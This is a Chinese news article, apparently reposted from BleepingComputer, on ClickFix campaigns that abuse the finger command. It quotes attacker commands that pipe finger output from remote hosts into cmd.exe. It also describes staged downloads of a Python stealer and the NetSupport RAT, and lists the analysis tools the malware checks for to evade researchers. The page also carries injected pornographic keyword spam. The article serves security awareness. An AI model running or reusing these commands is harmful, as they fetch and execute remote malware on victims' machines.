<cite id="ffb66"></cite><cite id="ffb66"><track id="ffb66"></track></cite>
      <legend id="ffb66"><li id="ffb66"></li></legend>
      色婷婷久,激情色播,久久久无码专区,亚洲中文字幕av,国产成人A片,av无码免费,精品久久国产,99视频精品3
      網易首頁 > 網易號 > 正文 申請入駐

      Finger協議遭濫用 淪為 ClickFix 惡意軟件攻擊工具

      0
      分享至


      有著數十年歷史的finger協議正重新活躍,威脅者借助這一協議獲取遠程指令,在Windows設備上執行惡意操作。

      過去,人們通過Finger協議,在Unix與Linux系統中使用finger命令查詢本地及遠程用戶信息,該命令后續也被加入Windows系統。盡管目前仍受支持,但相較于數十年前的普及度,如今其使用率已大幅下降。

      執行finger命令后,會返回用戶的基礎信息,包括登錄名、用戶名(若在/etc/passwd中設置)、主目錄、電話號碼、最后活躍時間及其他詳情。


      手指命令輸出

      近期,多起惡意攻擊活動開始利用Finger協議,疑似通過“ClickFix攻擊”獲取指令并在設備上執行。

      這并非finger命令首次被如此濫用——早在2020年,研究人員就曾發出警告,指出該命令已被用作“ Living-off-the-Land Binary( LOLBIN,合法系統工具濫用)”,用于下載惡意軟件并規避檢測。


      finger命令遭惡意濫用

      上月,網絡安全研究員分享了一個批處理文件。該文件執行后,會運行“finger root@finger.nateams[.]com”命令,從遠程finger服務器獲取指令,再通過管道符傳遞給cmd.exe在本地執行。


      手指命令輸出

      目前該服務器已無法訪問,但MalwareHunterTeam又發現了更多利用finger命令的惡意軟件樣本與攻擊活動。例如,Reddit平臺上有用戶近期發文警示,稱自己遭遇了一場偽裝成驗證碼驗證的ClickFix攻擊——攻擊者誘導其運行一條Windows命令,以“證明自己是人類”。

      盡管目前該服務器已不再響應finger請求,但另一位Reddit用戶捕獲了此前的輸出結果。這類攻擊將Finger協議用作遠程腳本傳輸工具:通過運行“finger vke@finger.cloudmega[.]org”命令,將輸出結果通過管道符傳遞給Windows命令處理器cmd.exe。

      這一操作會觸發獲取到的指令執行:創建隨機命名的路徑,將curl.exe復制為隨機文件名,通過重命名后的curl程序從cloudmega[.]org下載偽裝成PDF文件的壓縮包,并解壓出一個Python惡意軟件包。


      偽裝成PDF的檔案內容

      隨后,系統會通過“pythonw.exe __init__.py”命令執行該Python程序。最終執行的指令會向攻擊者的服務器回傳“執行成功”的確認信息,同時向用戶顯示偽造的“驗證你是人類”提示框。

      目前尚不清楚該Python惡意軟件包的具體用途,但從一個關聯批處理文件可推斷,其應為一款信息竊取工具。

      安全員還發現了另一項類似攻擊活動:通過“finger Kove2@api.metrics-strange.com | cmd”命令獲取并執行指令,操作流程與上述ClickFix攻擊幾乎一致。


      finger命令的輸出

      分析發現,這一攻擊手段更為成熟——指令會先檢測設備中是否存在惡意軟件研究常用工具,若發現則終止攻擊。這些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

      若未檢測到惡意軟件分析工具,指令會下載偽裝成PDF的壓縮包并解壓。但與此前不同的是,該壓縮包中并非Python惡意軟件包,而是NetSupport Manager遠程訪問工具(RAT)安裝包。


      NetSupport Manager RAT

      隨后,指令會配置一個計劃任務,確保用戶登錄時自動啟動該遠程訪問惡意軟件。

      目前來看,此類finger命令濫用活動似乎由單一威脅者發起,且主要通過ClickFix攻擊實施。但鑒于仍有用戶持續上當,相關攻擊活動需引起高度警惕。

      對于防御方而言,阻止finger命令濫用的最佳方式是攔截流向TCP 79端口的出站流量——該端口是Finger協議用于連接守護進程的專用端口。

      參考及來源:https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

      特別聲明:以上內容(如有圖片或視頻亦包括在內)為自媒體平臺“網易號”用戶上傳并發布,本平臺僅提供信息存儲服務。

      Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

      相關推薦
      熱點推薦
      俄媒:莫斯科迪納摩將于1月下旬舉行友誼賽,申花將參賽

      俄媒:莫斯科迪納摩將于1月下旬舉行友誼賽,申花將參賽

      懂球帝
      2025-12-30 12:29:19
      全新奧迪A6L現身街頭,外觀變化大,華為智駕,2.0T/3.0T,會火嗎

      全新奧迪A6L現身街頭,外觀變化大,華為智駕,2.0T/3.0T,會火嗎

      紅濤說車
      2025-12-30 16:40:49
      中國減持美債至7601億,魯比奧警告日本,石破茂緊隨反水

      中國減持美債至7601億,魯比奧警告日本,石破茂緊隨反水

      星辰夜語
      2025-12-30 18:15:14
      央視跨年晚會官宣,備受期待嘉賓排名出爐:刀郎上榜,周深排第4

      央視跨年晚會官宣,備受期待嘉賓排名出爐:刀郎上榜,周深排第4

      阿纂看事
      2025-12-30 14:39:34
      市場逼近崩盤,總理罕見用中文發聲,一句“對不起”能否獲得原諒

      市場逼近崩盤,總理罕見用中文發聲,一句“對不起”能否獲得原諒

      百科密碼
      2025-12-29 15:20:24
      美國告知中國,選好了主戰場!新的交鋒即將開始,中方把話說透

      美國告知中國,選好了主戰場!新的交鋒即將開始,中方把話說透

      滄海旅行家
      2025-12-30 18:18:38
      交流結束,蔣萬安閃電離滬,上飛機前通告全島,臺當局捅了馬蜂窩

      交流結束,蔣萬安閃電離滬,上飛機前通告全島,臺當局捅了馬蜂窩

      科普100克克
      2025-12-30 18:08:15
      挑釁原配、“睡”遍京圈,定居美國7年的徐靜蕾,私生活太狂野了

      挑釁原配、“睡”遍京圈,定居美國7年的徐靜蕾,私生活太狂野了

      時光在作祟
      2025-12-27 18:37:45
      大家盼的終究來了!大陸攔截向臺灣運載“海馬斯”火箭長榮貨輪

      大家盼的終究來了!大陸攔截向臺灣運載“海馬斯”火箭長榮貨輪

      頭條爆料007
      2025-12-30 17:24:39
      毛主席逝世,將軍悲痛欲絕,稱“想回到他身邊”,隨后,安然而逝

      毛主席逝世,將軍悲痛欲絕,稱“想回到他身邊”,隨后,安然而逝

      覃仕勇說史
      2025-12-30 17:41:24
      養老金核定表核對指南:江蘇退休人別漏看3處關鍵,錯1項可能少領

      養老金核定表核對指南:江蘇退休人別漏看3處關鍵,錯1項可能少領

      金哥說新能源車
      2025-12-30 10:44:31
      血常規檢查中最怕這4項指標出現異常!提醒:大概率會影響壽命

      血常規檢查中最怕這4項指標出現異常!提醒:大概率會影響壽命

      健康之光
      2025-12-30 10:13:22
      內斗再開?國民黨中央委員選舉,朱立倫大獲成功,鄭麗文排名靠后

      內斗再開?國民黨中央委員選舉,朱立倫大獲成功,鄭麗文排名靠后

      策前論
      2025-12-29 12:20:16
      美司令曾警告:若大陸武力收臺,美軍將摧毀中方火箭軍和核武庫!

      美司令曾警告:若大陸武力收臺,美軍將摧毀中方火箭軍和核武庫!

      壹知眠羊
      2025-12-21 07:15:19
      曾被吹捧上天,如今卻淪為笑柄的6個坑人物品,大家別再買了!

      曾被吹捧上天,如今卻淪為笑柄的6個坑人物品,大家別再買了!

      室內設計師有料兒
      2025-12-27 17:07:20
      林澤昌任財政部黨組成員、副部長

      林澤昌任財政部黨組成員、副部長

      界面新聞
      2025-12-30 17:56:39
      大反轉,遼寧隊慘敗卻收兩個好消息,超級巨星有望加入中國男籃

      大反轉,遼寧隊慘敗卻收兩個好消息,超級巨星有望加入中國男籃

      宗介說體育
      2025-12-30 17:41:58
      新疆維吾爾自治區烏魯木齊市委原常委巴哈特·何德爾拜接受審查調查

      新疆維吾爾自治區烏魯木齊市委原常委巴哈特·何德爾拜接受審查調查

      界面新聞
      2025-12-30 15:01:18
      35歲成都街頭崩潰:那個被“精致窮”毀掉的姑娘,給所有人警示!

      35歲成都街頭崩潰:那個被“精致窮”毀掉的姑娘,給所有人警示!

      涵豆說娛
      2025-12-30 14:06:28
      2026年1月1日起,一批新規將施行!

      2026年1月1日起,一批新規將施行!

      新華社
      2025-12-30 16:50:07
      2025-12-30 19:36:49
      嘶吼RoarTalk incentive-icons
      嘶吼RoarTalk
      不一樣的互聯網安全新視界
      8107文章數 10545關注度
      往期回顧 全部

      科技要聞

      估值150億的智元,開始批量"制造"小獨角獸

      頭條要聞

      副局長婚內與異性開房 前妻向紀委舉報其違規接受宴請

      頭條要聞

      副局長婚內與異性開房 前妻向紀委舉報其違規接受宴請

      體育要聞

      這個59歲的胖子,還在表演“蝎子擺尾”

      娛樂要聞

      林俊杰女友被扒 父親涉經濟案卷款13億?

      財經要聞

      朱光耀:美關稅政策正使WTO名存實亡

      汽車要聞

      標配華為乾崑ADS 4 Pro 華境S明年上半年上市

      態度原創

      家居
      時尚
      手機
      藝術
      本地

      家居要聞

      當歸之宅 三胎圓滿居所

      她們冬天這樣穿,真的很美!

      手機要聞

      行業首個性能Ultra!iQOO15 Ultra來了,最強散熱讓芯片封神

      藝術要聞

      謝稚柳雪景山水20圖

      本地新聞

      即將過去的2025年,對重慶的影響竟然如此深遠

      無障礙瀏覽 進入關懷版 主站蜘蛛池模板: 郁南县| 中文天堂最新版在线www| 日韩精品一区二区三区中文| 极品无码国模国产在线观看| 亚洲天堂va| 无码人妻一区二区三区线曰卧| 美女网站免费| 亚洲一区二区三区播放| 精品国内自产拍在线观看视频| 国产精品无码专区在线播放| 狠狠色狠狠色综合日日不卡| 成人午夜无码福利视频| 日韩无码专区| 日本理伦片午夜理伦片| 国产免费久久精品44| 亚洲成人在线播放| 国产精品爽黄69天堂a| 亚洲人成无码网站久久99热国产| 国产精品第一页中文字幕| AV在线无码| 中文字幕av在线| 日韩精品射精管理在线观看| 狠狠88综合久久久久综合网| 天堂网亚洲综合在线| 崇信县| 99久久伊人精品综合观看| 国产精品美女久久久免费| 蜜臀久久99精品久久久久酒店| yy19影院| 亚洲欧美日韩精品成人| 久久综合色鬼综合色| 国产在线观看免费观看| 人妻斩0930无码视频| 少妇被粗大猛进进出出| 国产精品美女久久久久久久| 亚洲AV第二区国产精品| 射阳县| 黄网站色视频免费观看| 91中文字幕在线一区| X66AV| 最新av播放|